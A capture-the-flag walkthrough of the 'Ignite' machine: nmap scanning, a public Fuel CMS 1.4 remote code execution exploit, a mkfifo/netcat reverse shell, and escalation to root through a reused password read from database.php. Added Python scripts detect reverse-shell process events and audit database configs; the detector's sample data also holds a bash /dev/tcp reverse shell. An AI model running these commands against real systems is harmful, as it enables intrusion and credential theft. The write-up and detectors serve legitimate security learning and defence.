Ignite

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.108.60

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying port 80

  • (-oN nmap): Saving the output to a file called nmap

nmap -sC -sV -p 80 -oN nmap 10.10.101.147

Enumeration

Let's visit the website.

It's a guide on how to use Fuel CMS. In the nmap scan we saw a hidden directory called /fuel, so let's visit that. It redirects us to this page.

It's a login page. At the moment we do not have credentials, so we cannot log in. Let's use searchsploit to search for exploits for this version of Fuel CMS.

searchsploit fuel cms 1.4

We can see that there are two remote code execution vulnerabilities; let's use one of them to exploit this machine. Let's copy this exploit to our working directory.

searchsploit -m linux/webapps/47138.py

Looking through the exploit, we need to change the URL to the URL of the machine we are attacking.

After changing it, I ran the exploit.

python 47138.py

We have remote code execution, so we can now run commands on the victim machine. Let's run a reverse shell command to get a shell on the machine. We can find a reverse shell here.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Make sure to change the IP and start a netcat listener.

nc -lvnp 1234

Before running the command, let's strip the unnecessary code out of the exploit so that parts we do not need cannot throw errors.

Now let's run the exploit and then the reverse shell command; we get a shell.

Now we can read the flag.txt file.
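From the defender's side, the step above (a CMS process handing an attacker an interactive shell over netcat) is exactly what process-start telemetry should flag. The following is an added example and not part of the original writeup: it scans constructed process-start events in a simplified "user=... parent=... cmd=..." format (not real auditd or EDR output) and reports the indicators that the reverse shell used above would leave behind, namely a shell spawned by the web stack under the web account, the mkfifo/netcat pattern, and bash's /dev/tcp device.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of process-start events (a simplified
# "user=<account> parent=<parent process> cmd=<command line>" format,
# not real auditd or EDR output). IPs and ports are placeholders.
SAMPLE_EVENTS = [
    "user=www-data parent=php-fpm cmd=/bin/sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 1234 >/tmp/f",
    "user=www-data parent=php-fpm cmd=/usr/bin/convert upload.png -resize 200x200 thumb.png",
    "user=alice parent=bash cmd=nc -lvnp 8080",
    "user=www-data parent=apache2 cmd=/bin/sh -c bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
]

# Accounts and parent processes that a web server / PHP handler typically runs as.
WEB_USERS = {"www-data", "apache", "nginx", "http"}
WEB_PARENTS = {"php-fpm", "apache2", "httpd", "nginx", "php"}

EVENT_RE = re.compile(r"user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)")


@dataclass
class Finding:
    event: str
    reasons: list = field(default_factory=list)


def analyse_event(line: str):
    """Return a Finding if the event looks like a web process handing out a shell, else None."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    user, parent, cmd = m.group("user"), m.group("parent"), m.group("cmd")
    reasons = []
    # A shell spawned by the web stack under the web account is unusual on its own.
    if user in WEB_USERS and parent in WEB_PARENTS and re.search(r"(^|/)(ba)?sh\b", cmd):
        reasons.append("web server process spawned a shell")
    # Named pipe wired to an interactive shell and a netcat connection (the pattern used above).
    if "mkfifo" in cmd and re.search(r"\b(nc|ncat|netcat)\b", cmd) and re.search(r"sh -i", cmd):
        reasons.append("fifo + netcat reverse shell pattern")
    # bash's /dev/tcp pseudo-device used for an outbound connection.
    if "/dev/tcp/" in cmd:
        reasons.append("bash /dev/tcp outbound connection")
    return Finding(line, reasons) if reasons else None


def analyse_events(lines):
    """Run analyse_event over a sequence of lines and keep only the hits."""
    return [f for f in map(analyse_event, lines) if f]


if __name__ == "__main__":
    for f in analyse_events(SAMPLE_EVENTS):
        print(f.reasons, "<-", f.event[:70])
```

The first rule is the one that matters most: the exact reverse shell string changes from engagement to engagement, but a PHP worker spawning /bin/sh as www-data is rare enough in normal operation that it is worth alerting on regardless of what the shell then does.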

Privilege Escalation

After looking around for a while, I went into the /var/www/html/fuel/application/config directory, as config files are always interesting. One file that looked very interesting to me was database.php, as I thought I could find usernames and passwords in it.

cat database.php

And I did find the root password.

Now it's time to switch users to root.

su root

And we are now root, so we can go and read the root.txt flag.
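The escalation worked because database.php held a root credential that the web-server account could read and that was reused for the OS root account. As an added example (not part of the original writeup, and not Fuel CMS's own code), the script below audits a CodeIgniter-style database.php for the conditions that made this possible: it parses the quoted key => value settings, and reports a root database user, a plaintext password, and a world-readable file. The PHP snippet is constructed with placeholder values; the hostname and password are not the machine's real ones.

```python
import os
import re
import stat
import tempfile

# Constructed sample modelled on a CodeIgniter-style database.php;
# the credential values are placeholders, not the machine's real config.
SAMPLE_DATABASE_PHP = """<?php
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'EXAMPLE_PASSWORD',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
);
"""

# Matches entries of the form 'key' => 'value' (single-quoted, as CodeIgniter writes them).
SETTING_RE = re.compile(r"'(?P<key>\w+)'\s*=>\s*'(?P<value>[^']*)'")


def parse_db_config(text: str) -> dict:
    """Extract the quoted key => value pairs from a database.php file body."""
    return {m.group("key"): m.group("value") for m in SETTING_RE.finditer(text)}


def audit_db_config(settings: dict, mode: int) -> list:
    """Return findings for a parsed config and the file's permission bits (st_mode)."""
    findings = []
    # The application should use a dedicated, least-privilege database account.
    if settings.get("username") == "root":
        findings.append("application connects to the database as root")
    # Any non-empty password here is readable by whoever can read the file.
    if settings.get("password"):
        findings.append("plaintext database password stored in config")
    # The web server account needs to read it, but nobody else should.
    if mode & stat.S_IROTH:
        findings.append("config file is world-readable")
    return findings


def audit_file(path: str) -> list:
    """Read a database.php from disk and audit its contents and permissions."""
    with open(path) as fh:
        settings = parse_db_config(fh.read())
    return audit_db_config(settings, os.stat(path).st_mode)


if __name__ == "__main__":
    # Write the constructed sample to a temp file with typical 644 permissions and audit it.
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as fh:
        fh.write(SAMPLE_DATABASE_PHP)
    os.chmod(fh.name, 0o644)
    for line in audit_file(fh.name):
        print("-", line)
    os.unlink(fh.name)
```

The script cannot tell whether the database password is also the OS root password; that check has to be a policy (separate credentials per service, no root database user for a web app) rather than something read off the file.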
